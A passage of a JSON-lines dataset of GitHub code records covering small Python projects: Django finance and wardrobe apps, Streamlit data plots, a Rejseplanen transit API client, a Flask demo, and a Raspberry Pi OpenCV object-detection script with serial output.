'QUIT')\n\tdef on_click_Name(self):\n\t\tprint('name')\n\t\tself.redis_client.rpush('sensor', 'NAME')\n\n\n\nif __name__ == '__main__':\n\tredis_client = redis.StrictRedis(host='localhost', port=6379)\n\tapp = QApplication(sys.argv)\n\n\tex = App(redis_client)\n\tsys.exit(app.exec_())\n", "repo_name": "Raquelometer/masters_thesis", "sub_path": "record_data_UI.py", "file_name": "record_data_UI.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 13, "usage_type": "argument"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 37, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "16826691026", "text": "from django.shortcuts import render\nimport math\n\nfrom savings.models import Goal\n# Create your views here.\ndef fvapmt(fv,r,t):\n return ((fv*r)/((1+r)**t-1))\n\ndef savings(request):\n context = {}\n user = request.user\n goals = Goal.objects.all().filter(user__username__contains=user.username)\n payments = []\n data = []\n for g in goals:\n fv = g.amount\n r = (g.rate/100)\n t = g.time\n answer = fvapmt(fv,r,t)\n formatted = str(round(answer, 2))\n payments.append(formatted)\n data.append([g,formatted])\n\n context = {'goals':goals, 'payments':payments, 'data':data}\n return render(request, 'savings/index.html', context)\n\ndef goalSettingPage(request):\n return render(request, 'savings/setGoal.html')\n\ndef setNewGoal(request):\n context = {}\n form = Goal()\n if request.method == \"POST\":\n form = Goal(request.POST)\n goalname = request.POST.get('goalname')\n amount = request.POST.get('amount')\n time = request.POST.get('time')\n rate = request.POST.get('rate')\n form = Goal(user=request.user, goalname=goalname, amount=amount, time=time, rate=rate)\n form.save()\n context = {'form': form}\n return savings(request)\n return savings(request)", "repo_name": "EngandDeveloper/uofthacks8", "sub_path": "finance/savings/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "savings.models.Goal.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "savings.models.Goal.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "savings.models.Goal", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 32, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 34, "usage_type": "call"}, {"api_name": "savings.models.Goal", "line_number": 39, "usage_type": "call"}, {"api_name": "savings.models", "line_number": 42, "usage_type": "call"}, {"api_name": "savings.models", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "75112731368", "text": "import pandas as pd\nimport plotly_express as px\nimport folium\nfrom folium import Choropleth, Circle, Marker, Icon, map\nfrom streamlit_folium import folium_static\nfrom keplergl import KeplerGl\nfrom streamlit_keplergl import keplergl_static\nimport streamlit as st\ndef load_data():\n df = pd.read_csv(\"data/macroalgae_final.csv\", index_col=0)\n df = df.drop([\"kingdom\", \"class\", \"genus\", \"new\"], axis = 1)\n df.dropna(inplace=True)\n return df.drop_duplicates([\"lon\", \"lat\"])\n\ndef family_list():\n data = load_data()\n return list(data[\"family\"].unique())\n\ndef lista_especies():\n data = load_data()\n return list(data[\"species\"].unique())\n\n\ndef pie_chart_family():\n df = load_data()\n df2 = df.groupby(\"family\")[\"family\"].agg([\"count\"]).reset_index()\n fig = px.pie(df2, values = \"count\", names = \"family\", title = \"number of families on the dataframe\")\n fig.update_traces(textposition='inside') # para poner los % dentro del quesito\n\n fig.update_layout(uniformtext_minsize=15, uniformtext_mode='hide')\n\n return fig\n\n\ndef pie_chart_genus(familia):\n df = load_data()\n df = df[df[\"family\"]== f'{familia}']\n df2 = df.groupby(\"country\")[\"country\"].agg([\"count\"]).reset_index()\n\n fig = px.pie(df2, values = \"count\", names = \"country\", title = \"number of genus on the dataframe\")\n \n fig.update_traces(textposition='inside') # para poner los % dentro del quesito\n\n fig.update_layout(uniformtext_minsize=15, uniformtext_mode='hide')\n\n return fig\n\n\ndef plots_year (df, x_axis):\n \"\"\"\n Function to create a plot to represent the evolution of data through the years\n Args: \n df: dataframe\n x_axis: target species that you are interested in \n Returns:\n A plotly line plot\n \"\"\"\n df = df.groupby(['species', 'year'])['year'].agg(['count']).reset_index()\n df = df[df[\"species\"]== f\"{x_axis}\"]\n return px.line(df, x='year', y = \"count\", title = \"Number of species per year\")\n\ndef plots_month(df, x_axis):\n \"\"\"\n Function to create a plot to represent the evolution of data through the months\n Args: \n df: dataframe\n x_axis: target species that you are interested in \n Returns:\n A plotly bar plot\n \"\"\"\n df = df.groupby(['species', 'month'])['month'].agg(['count']).reset_index()\n df = df[df[\"species\"]== f\"{x_axis}\"]\n return px.bar(df, x='month', y = \"count\", title='Number of presences epr month')\n\n\ndef load_info():\n return pd.read_csv(\"data/species_info.csv\", index_col=0)\n\n\ndef maps(df):\n map_sby = folium.Map(tiles=\"OpenStreetMap\", location=[40.4146, -3.7004], zoom_start=2)\n\n for i,row in df.iterrows():\n \n icon = Icon(color = \"green\",\n prefix = \"fa\",\n icon = \"fa-map-marker\",\n icon_color = \"black\"\n )\n\n location_ = {\"location\" : [row[\"lat\"],row[\"lon\"]],\n \"tooltip\" : row[\"locality\"]}\n \n\n marker_2 = Marker(**location_, icon = icon).add_to(map_sby)\n\n return folium_static(map_sby)\n\ndef kepler (df, con):\n df = pd.DataFrame(df.groupby(['fecha', 'species', 'lat', 'lon'])['number_ind'].sum()).reset_index()\n st.dataframe(df)\n map_3 = KeplerGl(height=600, width=800, config = con)\n map_3.add_data(data = df, name='algae' )\n\n return keplergl_static(map_3)", "repo_name": "Ironhack-Part-Time-Enero2022/apuntes-clases", "sub_path": "semana-11/Streamlit/src/support.py", "file_name": "support.py", "file_ext": "py", "file_size_in_byte": 3345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", 
"api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "plotly_express.pie", "line_number": 27, "usage_type": "call"}, {"api_name": "plotly_express.pie", "line_number": 40, "usage_type": "call"}, {"api_name": "plotly_express.line", "line_number": 60, "usage_type": "call"}, {"api_name": "plotly_express.bar", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 77, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 81, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 85, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit_folium.folium_static", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.dataframe", "line_number": 101, "usage_type": "call"}, {"api_name": "keplergl.KeplerGl", "line_number": 102, "usage_type": "call"}, {"api_name": "streamlit_keplergl.keplergl_static", "line_number": 105, "usage_type": "call"}]}
+{"seq_id": "42125683728", "text": "from django.forms import ModelForm\nfrom .models import Item, Outfit\nfrom django import forms\nfrom django.utils.safestring import mark_safe\n\n\nclass CustomModelMultipleChoiceField(forms.ModelMultipleChoiceField):\n def label_from_instance(self, items):\n if items.url:\n return mark_safe(\" \" % items.url)\n else:\n return mark_safe(\" \" % items.imageURL)\n \n\nclass ItemForm(ModelForm):\n class Meta:\n model = Item\n fields = ['name', 'description', 'type', 'image', 'url', 'price', 'sell']\n labels = {\n 'name': 'Item name',\n 'description': 'Item description',\n 'type': 'Item type',\n 'image': 'Item image', \n 'url': 'Image url (if not uploading an image)',\n 'price': 'Price (if item is for sale)',\n 'sell': 'For sale?',\n \n }\n\n def __init__(self, *args, **kwargs):\n super(ItemForm, self).__init__(*args, **kwargs)\n for name, field in self.fields.items():\n field.widget.attrs.update({'class': 'input'})\n\n\nclass OutfitForm(ModelForm):\n class Meta:\n model = Outfit\n fields = ['name', 'description', 'items']\n labels = {\n 'name': 'Outfit Name',\n 'description': 'Outfit Description',\n 'items': 'Outfit Items',\n }\n\n \n items = CustomModelMultipleChoiceField(\n queryset=None,\n widget=forms.CheckboxSelectMultiple\n )\n\n def __init__(self, *args, **kwargs):\n \"\"\" Grants access to the request object so that only members of the current user\n are given as options\"\"\"\n\n self.request = kwargs.pop('request')\n super(OutfitForm, self).__init__(*args, **kwargs)\n self.fields['items'].queryset = Item.objects.filter(\n owner=self.request.user.profile)\n\n", "repo_name": "davemolk/closet_companion", "sub_path": "wardrobe/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 10, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Outfit", "line_number": 38, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 49, "usage_type": "name"}, {"api_name": "models.Item.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Item.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Item", "line_number": 58, "usage_type": "name"}]}
+{"seq_id": "408394391", "text": "\"\"\"\nPython implementation of communication with Rejseplanen API.\n\nMore information about the API can be found at\nhttps://help.rejseplanen.dk/hc/en-us/articles/214174465-Rejseplanen-s-API\n\n\"\"\"\nfrom datetime import datetime\nimport requests\n\nfrom .classes import *\nfrom .constants import *\n\ndef _request(service, params, timeout):\n params['format'] = 'json'\n \n try:\n response = requests.get(RESOURCE+service, params, timeout=timeout)\n except requests.exceptions.RequestException as e:\n raise rjplConnectionError(e)\n\n if response.status_code == 200:\n return response.json()\n else:\n raise rjplHTTPError('Error: ' + str(response.status_code) +\n str(response.content))\n\ndef location(input, timeout=5):\n \"\"\" Perform a pattern matching of user input.\n\n Args:\n input (str): The search input.\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Returns:\n Dictionary object.\n Keys:\n 'StopLocation': List of dictionaries of stop locations with coordinates.\n 'CoordLocation': List of dictionaries of named points of interests with coordinates.\n \"\"\"\n params = {}\n\n if isinstance(input, str):\n params['input'] = input\n else:\n raise TypeError(\"Expected got {}\".format(type(input)))\n \n response = _request('location', params, timeout)\n\n result = response['LocationList']\n\n if 'error' in result:\n raise rjplAPIError(result['error'])\n\n return result\n\ndef trip(origin, destination, viaId=None, time=None, searchForArrival=None, useTrain=True, \n useBus=True, useMetro=True, useBicycle=False, maxWalkingDistanceDep=None, \n maxWalkingDistanceDest=None, maxCyclingDistanceDep=None, maxCyclingDistanceDest=None, timeout=10):\n \"\"\" Calculates trip from specified origin to specified destination. \n\n Args:\n origin (rjpl.Coord or rjpl.Stop): Trip origin.\n destination (rjpl.Coord or rjpl.Stop): Trip destination.\n viaId (int): Id of stop to force the trip through.\n time (datetime): Departure date and time of the trip. (default: current server time)\n searchForArrival (bool): If true, time will be used for arrival time instead. (default: False)\n useTrain (bool): Whether to travel by train (default: True)\n useBus (bool): Whether to travel by bus (default: True)\n useMetro (bool): Whether to travel by metro (default: True)\n useBicycle (bool): Restrict to trips which allow carriage of bicycles. (default: False)\n timeout (int): Timeout time of requests.get() call in seconds.\n\n Extra args if useBicycle=False:\n maxWalkingDistanceDep (int): The max walking distance from start location to the first mode of transportation.\n maxWalkingDistanceDest (int): The max walking distance from last mode of transportation to the destination.\n\n Extra args if useBicycle=True\n maxCyclingDistanceDep (int): The max biking distance from start location to the first mode of public transportation.\n maxCyclingDistanceDest (int): The max biking distance from the last mode of public transportation to the destination.\n\n Returns:\n List of possible trips from origin to destination. 
The trips are given as dictionaries, with a list of legs.\n    \"\"\"\n    params = {}\n\n    if isinstance(origin, Place):\n        if isinstance(origin, Stop):\n            params['originId'] = origin.stop_id\n        elif isinstance(origin, Coord):\n            params['originCoordX'] = int(COORDINATE_MULTIPLIER*origin.coordX)\n            params['originCoordY'] = int(COORDINATE_MULTIPLIER*origin.coordY)\n            params['originCoordName'] = origin.name\n        else:\n            raise TypeError(\"Unknown instance of <Place>.\")\n    else:\n        raise TypeError(\"Expected <Place> got {}.\".format(type(origin)))\n\n    if isinstance(destination, Place):\n        if isinstance(destination, Stop):\n            params['destId'] = destination.stop_id\n        elif isinstance(destination, Coord):\n            params['destCoordX'] = int(COORDINATE_MULTIPLIER*destination.coordX)\n            params['destCoordY'] = int(COORDINATE_MULTIPLIER*destination.coordY)\n            params['destCoordName'] = destination.name\n        else:\n            raise TypeError(\"Unknown instance of <Place>.\")\n    else:\n        raise TypeError(\"Expected <Place> got {}.\".format(type(destination)))\n\n    if viaId is not None:\n        if isinstance(viaId, int):\n            params['viaId'] = viaId\n        else:\n            raise TypeError(\"Expected <int> got {}.\".format(type(viaId)))\n\n    if searchForArrival is not None:\n        if isinstance(searchForArrival, bool):\n            params['searchForArrival'] = int(searchForArrival)\n        else:\n            raise TypeError(\"Expected <bool>, got {}.\".format(type(searchForArrival)))\n    \n    if isinstance(useTrain, bool):\n        params['useTog'] = int(useTrain)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useTrain)))\n    \n    if isinstance(useBus, bool):\n        params['useBus'] = int(useBus)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useBus)))\n    \n    if isinstance(useMetro, bool):\n        params['useMetro'] = int(useMetro)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useMetro)))\n    \n    if time:\n        if isinstance(time, datetime):\n            params['date'] = time.strftime(DATE_FORMAT)\n            params['time'] = time.strftime(TIME_FORMAT)\n        else:\n            raise TypeError('Expected datetime.datetime, got {}.'.format(type(time)))\n\n    if isinstance(useBicycle, bool):\n        params['useBicycle'] = int(useBicycle)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useBicycle)))\n\n    if useBicycle:\n        if maxWalkingDistanceDep is not None:\n            raise ValueError(\"Can't use maxWalkingDistanceDep with useBicycle.\")\n        if maxWalkingDistanceDest is not None:\n            raise ValueError(\"Can't use maxWalkingDistanceDest with useBicycle.\")\n\n        if maxCyclingDistanceDep is not None:\n            if isinstance(maxCyclingDistanceDep, int):\n                if maxCyclingDistanceDep >= 500 and maxCyclingDistanceDep <= 20000:\n                    params['maxCyclingDistanceDep'] = maxCyclingDistanceDep\n                else:\n                    raise ValueError(\"maxCyclingDistanceDep out of bounds.\")\n            else:\n                raise TypeError(\"Expected <int>, got {}.\".format(type(maxCyclingDistanceDep)))    \n        if maxCyclingDistanceDest is not None:\n            if isinstance(maxCyclingDistanceDest, int):\n                if maxCyclingDistanceDest >= 500 and maxCyclingDistanceDest <= 20000:\n                    params['maxCyclingDistanceDest'] = maxCyclingDistanceDest\n                else:\n                    raise ValueError(\"maxCyclingDistanceDest out of bounds.\")\n            else:\n                raise TypeError(\"Expected <int>, got {}.\".format(type(maxCyclingDistanceDest)))\n\n    else:\n        if maxCyclingDistanceDep is not None:\n            raise ValueError(\"Can't use maxCyclingDistanceDep without useBicycle.\")\n        if maxCyclingDistanceDest is not None:\n            raise ValueError(\"Can't use maxCyclingDistanceDest without useBicycle.\")\n\n        if maxWalkingDistanceDep is not None:\n            if isinstance(maxWalkingDistanceDep, int):\n                if maxWalkingDistanceDep >= 500 and maxWalkingDistanceDep <= 20000:\n                    
params['maxWalkingDistanceDep'] = maxWalkingDistanceDep\n                else:\n                    raise ValueError(\"maxWalkingDistanceDep out of bounds.\")\n            else:\n                raise TypeError(\"Expected <int>, got {}.\".format(type(maxWalkingDistanceDep)))    \n        if maxWalkingDistanceDest is not None:\n            if isinstance(maxWalkingDistanceDest, int):\n                if maxWalkingDistanceDest >= 500 and maxWalkingDistanceDest <= 20000:\n                    params['maxWalkingDistanceDest'] = maxWalkingDistanceDest\n                else:\n                    raise ValueError(\"maxWalkingDistanceDest out of bounds.\")\n            else:\n                raise TypeError(\"Expected <int>, got {}.\".format(type(maxWalkingDistanceDest)))    \n\n    response = _request('trip', params, timeout)\n\n    result = response['TripList']\n    if 'error' in result:\n        raise rjplAPIError(result['error'])\n\n    return result['Trip']\n\n\ndef departureBoard(stop_id, useTrain=True, useBus=True, useMetro=True, time=None, offset=None, timeout=10):\n    \"\"\" Retrieve a station departure board.\n\n    Args:\n        stop_id (int): The station id. Can be retrieved with the location() call.\n        useTrain (bool): Whether to travel by train (default: True)\n        useBus (bool): Whether to travel by bus (default: True)\n        useMetro (bool): Whether to travel by metro (default: True)\n        time (datetime): Departure date and time of the trip. (default: current server time)\n        offset (int): Search a number of minutes into the future. Use either time or offset.\n        timeout (int): Timeout time of requests.get() call in seconds.\n\n    Returns:\n        A list of dictionaries, each containing departure name, time, direction and type.\n    \"\"\"\n    params = {}\n\n    if type(stop_id) is int:\n        params['id'] = stop_id\n    else:\n        raise TypeError(\"Expected <int>, got {}.\".format(type(stop_id)))\n\n    if isinstance(useTrain, bool):\n        params['useTog'] = int(useTrain)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useTrain)))\n    \n    if isinstance(useBus, bool):\n        params['useBus'] = int(useBus)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useBus)))\n    \n    if isinstance(useMetro, bool):\n        params['useMetro'] = int(useMetro)\n    else:\n        raise TypeError(\"Expected <bool>, got {}.\".format(type(useMetro)))\n    \n    if time and offset:\n        raise ValueError('Cannot specify both time and offset.')\n\n    if time:\n        if isinstance(time, datetime):\n            params['date'] = time.strftime(DATE_FORMAT)\n            params['time'] = time.strftime(TIME_FORMAT)\n        else:\n            raise TypeError('Expected datetime.datetime, got {}.'.format(type(time)))\n\n    if offset:\n        if isinstance(offset, int):\n            params['offset'] = offset\n        else:\n            raise TypeError(\"Expected <int>, got {}.\".format(type(offset)))\n\n    response = _request('departureBoard', params, timeout)\n    \n    result = response['DepartureBoard']\n\n    # This key is present on error\n    if 'error' in result:\n        raise rjplAPIError(result['error'])\n\n    return result['Departure']\n\n\ndef multiDepartureBoard(*ids, **args):\n    \"\"\" Retrieve multiple station departure boards at once.\n\n    Args:\n        *ids: Variable length argument list: The stop ids.\n        **args: Keyword arguments:\n            useTrain (bool): Whether to travel by train (default: True)\n            useBus (bool): Whether to travel by bus (default: True)\n            useMetro (bool): Whether to travel by metro (default: True)\n            time (datetime): Departure date and time of the trip. 
(default: current server time)\n            timeout (int): Timeout time of requests.get() call in seconds.\n\n    Returns:\n        A list of dictionaries, each containing departure name, time, direction and type.\n        The results from all stops are mixed, but can be filtered by stop.\n    \"\"\"\n\n    if len(ids) < 1:\n        raise ValueError(\"Need at least one id.\")\n\n    params = {'id{}'.format(i+1): ids[i] for i in range(len(ids))}\n    timeout = 10\n\n    for key in args.keys():\n        if key == 'time':\n            if isinstance(args['time'], datetime):\n                params['date'] = args['time'].strftime(DATE_FORMAT)\n                params['time'] = args['time'].strftime(TIME_FORMAT)\n            else:\n                raise TypeError('Expected datetime.datetime, got {}.'.format(type(args['time'])))\n\n        elif key == 'useTrain':\n            if isinstance(args['useTrain'], bool):\n                params['useTog'] = int(args['useTrain'])\n            else:\n                raise TypeError(\"Expected <bool>, got {}.\".format(type(args['useTrain'])))\n        \n        elif key == 'useBus':\n            if isinstance(args['useBus'], bool):\n                params['useBus'] = int(args['useBus'])\n            else:\n                raise TypeError(\"Expected <bool>, got {}.\".format(type(args['useBus'])))\n\n        elif key == 'useMetro':\n            if isinstance(args['useMetro'], bool):\n                params['useMetro'] = int(args['useMetro'])\n            else:\n                raise TypeError(\"Expected <bool>, got {}.\".format(type(args['useMetro'])))\n\n        elif key == 'timeout':\n            if isinstance(args['timeout'], int):\n                timeout=args['timeout']\n            else:\n                raise TypeError(\"Expected <int>, got {}.\".format(type(args['timeout'])))\n        \n        else:\n            raise ValueError(\"Unknown argument '{}'.\".format(key))\n    \n    response = _request('multiDepartureBoard', params, timeout=timeout)\n\n    result = response['MultiDepartureBoard']\n\n    if 'error' in result:\n        raise rjplAPIError(result['error'])\n\n    return result['Departure']\n\ndef stopsNearby(coordX, coordY, maxRadius=None, maxNumber=None, timeout=5):\n    \"\"\" Finds stops close to given coordinates.\n\n    Args:\n        coordX (float): Longitude.\n        coordY (float): Latitude.\n        maxRadius (int): The radius in meters to search within.\n        maxNumber (int): The number of results to return.\n        timeout (int): Timeout time of requests.get() call in seconds.\n\n    Returns:\n        A list of nearby stops where each stop is a dictionary.\n    \"\"\"\n    params = {}\n    if isinstance(coordX, float):\n        params['coordX'] = int(COORDINATE_MULTIPLIER*coordX)\n    else:\n        raise TypeError(\"Expected <float>, got {}.\".format(type(coordX)))\n\n    if isinstance(coordY, float):\n        params['coordY'] = int(COORDINATE_MULTIPLIER*coordY)\n    else:\n        raise TypeError(\"Expected <float>, got {}.\".format(type(coordY)))\n\n    if maxRadius is not None:\n        if isinstance(maxRadius, int):\n            params['maxRadius'] = maxRadius\n        else:\n            raise TypeError(\"Expected <int>, got {}.\".format(type(maxRadius)))\n\n    if maxNumber is not None:\n        if isinstance(maxNumber, int):\n            params['maxNumber'] = maxNumber\n        else:\n            raise TypeError(\"Expected <int>, got {}.\".format(type(maxNumber)))\n\n    response = _request('stopsNearby', params, timeout)\n\n    result = response['LocationList']\n    if 'error' in result:\n        raise rjplAPIError(result['error'])\n    return result.get('StopLocation', [])\n\nif __name__ == \"__main__\":\n    pass\n", "repo_name": "thomaspasser/python-rejseplanen", "sub_path": "rjpl/methods.py", "file_name": "methods.py", "file_ext": "py", "file_size_in_byte": 15009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.datetime", 
"line_number": 139, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 246, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 294, "usage_type": "argument"}]}
+{"seq_id": "10251246962", "text": "import time\nimport random\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef default(name):\n time.sleep(random.randint(1, 5))\n return \"hi, {}\".format(name)\n\nif __name__ == '__main__':\n app.run()\n\n\n\n", "repo_name": "perrydzhu/pydem0", "sub_path": "thread-process/web_demo.py", "file_name": "web_demo.py", "file_ext": "py", "file_size_in_byte": 231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "30082150233", "text": "import cv2 as cv\nimport glob\nimport os\nimport numpy\nimport serial\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\n\nfont = cv.FONT_HERSHEY_DUPLEX\n\nCONF = 0.6\n\nser = serial.Serial(\n\n port='/dev/ttyS0',\n baudrate = 9600,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=0.1,\n write_timeout=0.1)\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\nrawCapture = PiRGBArray(camera)\n\n# Wait for the automatic gain control to settle\ntime.sleep(2)\n\n# Now fix the values\ncamera.shutter_speed = camera.exposure_speed\ncamera.exposure_mode = 'off'\ng = camera.awb_gains\ncamera.awb_mode = 'off'\ncamera.awb_gains = g\n\ncvNet = cv.dnn.readNetFromTensorflow('sorted_inference_graph.pb', 'graph.pbtxt')\n\ncount = 0\n\nwhile True:\n\n serData = ser.readline()\n #print(serData)\n if serData == b'1\\r\\n':\n print(\"Testing image\")\n #Take image\n rawCapture = PiRGBArray(camera)\n camera.capture(rawCapture, format=\"bgr\")\n \n img = rawCapture.array\n img = cv.flip(img, -1)\n\n height, width, channels = img.shape\n \n scr_x = round(width/2)\n scr_y = round(height/2)\n\n cvNet.setInput(cv.dnn.blobFromImage(img, size=(300, 300), swapRB=True, crop=False))\n cvOut = cvNet.forward()\n\n \n netMax = 0\n arrayMax = [0,0,0,0,0,0,0]\n \n for detection in cvOut[0,0,:,:]:\n \n if float(detection[2]) > netMax:\n netMax = detection[2]\n arrayMax = detection\n \n\t\t# print(arrayMax)\n \n\t\t# print(cvOut)\n \n score = float(arrayMax[2])\n\n if score > CONF:\n\n left = int(arrayMax[3] * width)\n top = int(arrayMax[4] * height)\n right = int(arrayMax[5] * width)\n bottom = int(arrayMax[6] * height)\n\n cx = round(left - (left- right)/2)\n cy = round(top - (top- bottom)/2)\n\n cv.line(img,(cx,scr_y),(scr_x,scr_y),(255,0,0),2)\n cv.line(img,(cx,scr_y),(cx,cy),(255,0,0),2)\n\n #Cross hairs\n cv.line(img,(scr_x-20,scr_y),(scr_x+20,scr_y),(238,244,21),3)\n cv.line(img,(scr_x,scr_y-20),(scr_x,scr_y+20),(238,244,21),3)\n\n cv.circle(img,(cx,cy), 3, (0,0,255), -1)\n \n Offest = scr_x - cx\n\n print(\"Offest X: {}\".format(Offest))\n\n #Detection box\n cv.rectangle(img, (left, top), (right, bottom), (23, 230, 210), thickness=2)\n\n #Put text on image\n cv.putText(img,\"X_Of:\"+str(Offest)+\"px\",(10,430), font, 2,(0,0,0),3,cv.LINE_AA)\n cv.putText(img,\"P():\"+str(round(score*100))+\"%\",(10,500), font, 2,(0,0,0),3,cv.LINE_AA)\n\n #Save image\n cv.imwrite('detect_img/{}.png'.format(count),img)\n cv.imwrite('/home/pi/Desktop/Website/img/img.png',img)\n count += 1\n \n print(\"Found\")\n\n serilString = \"1,\"+ str(Offest)+\"|\"\n ser.write(serilString.encode('utf-8'))\n \n else:\n print(\"Not found\")\n serilString = \"0,0000|\"\n ser.write(serilString.encode('utf-8'))\n cv.imwrite('/home/pi/Desktop/Website/img/img.png',img)\n\n\n else:\n ser.flush()\n ", "repo_name": "JTmax/Mech2_Assessment_3", "sub_path": "RaspCode/cnn_cup_model_offset.py", "file_name": "cnn_cup_model_offset.py", "file_ext": "py", "file_size_in_byte": 3346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.FONT_HERSHEY_DUPLEX", "line_number": 10, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 14, "usage_type": "call"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 19, "usage_type": "attribute"}, {"api_name": 
"picamera.PiCamera", "line_number": 24, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.dnn.readNetFromTensorflow", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 37, "usage_type": "attribute"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 105, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 106, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 122, "usage_type": "call"}]}
